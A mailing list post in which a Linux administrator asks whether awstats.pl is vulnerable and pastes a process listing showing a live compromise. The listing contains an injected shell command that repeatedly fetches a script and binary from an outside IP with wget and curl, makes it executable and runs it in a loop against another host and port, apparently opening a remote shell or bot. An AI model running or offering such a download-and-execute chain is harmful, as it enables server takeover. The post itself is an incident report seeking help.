Any vulnerability in awstats.pl?
I suddenly have these processes running...
6086 ? S 0:00 /usr/bin/perl /var/www/cgi-bin/awstats.pl
6087 ? R 81:06 sh -c echo ;echo b_exp;wget http://219.84.105.36/ping
.txt;mv ping.txt temp2006;perl temp2006 220.227.100.4 3303;wget http://219.84.10
5.36/ping;chmod +x ping;./ping 220.227.100.4 3303;curl -o ping http://219.84.105
.36/ping;chmod +x ping;./ping 220.227.100.4 3303;cd /tmp/;curl -o temp2006 http:
//219.84.105.36/ping.txt;while [ 1 ];do perl temp2006 220.227.100.4 3303;done;wg
et http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;curl -o pin
g http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;echo e_exp;%
00/awstats.w.x.y.z.conf
where w.x.y.z is my public ip...
anybody know what this is that what's it's trying to do...
_________________________________________________ Philippine Linux Users' Group (PLUG) Mailing List [email protected] (#PLUG @ irc.free.net.ph) Read the Guidelines: http://linux.org.ph/lists Searchable Archives: http://archives.free.net.ph
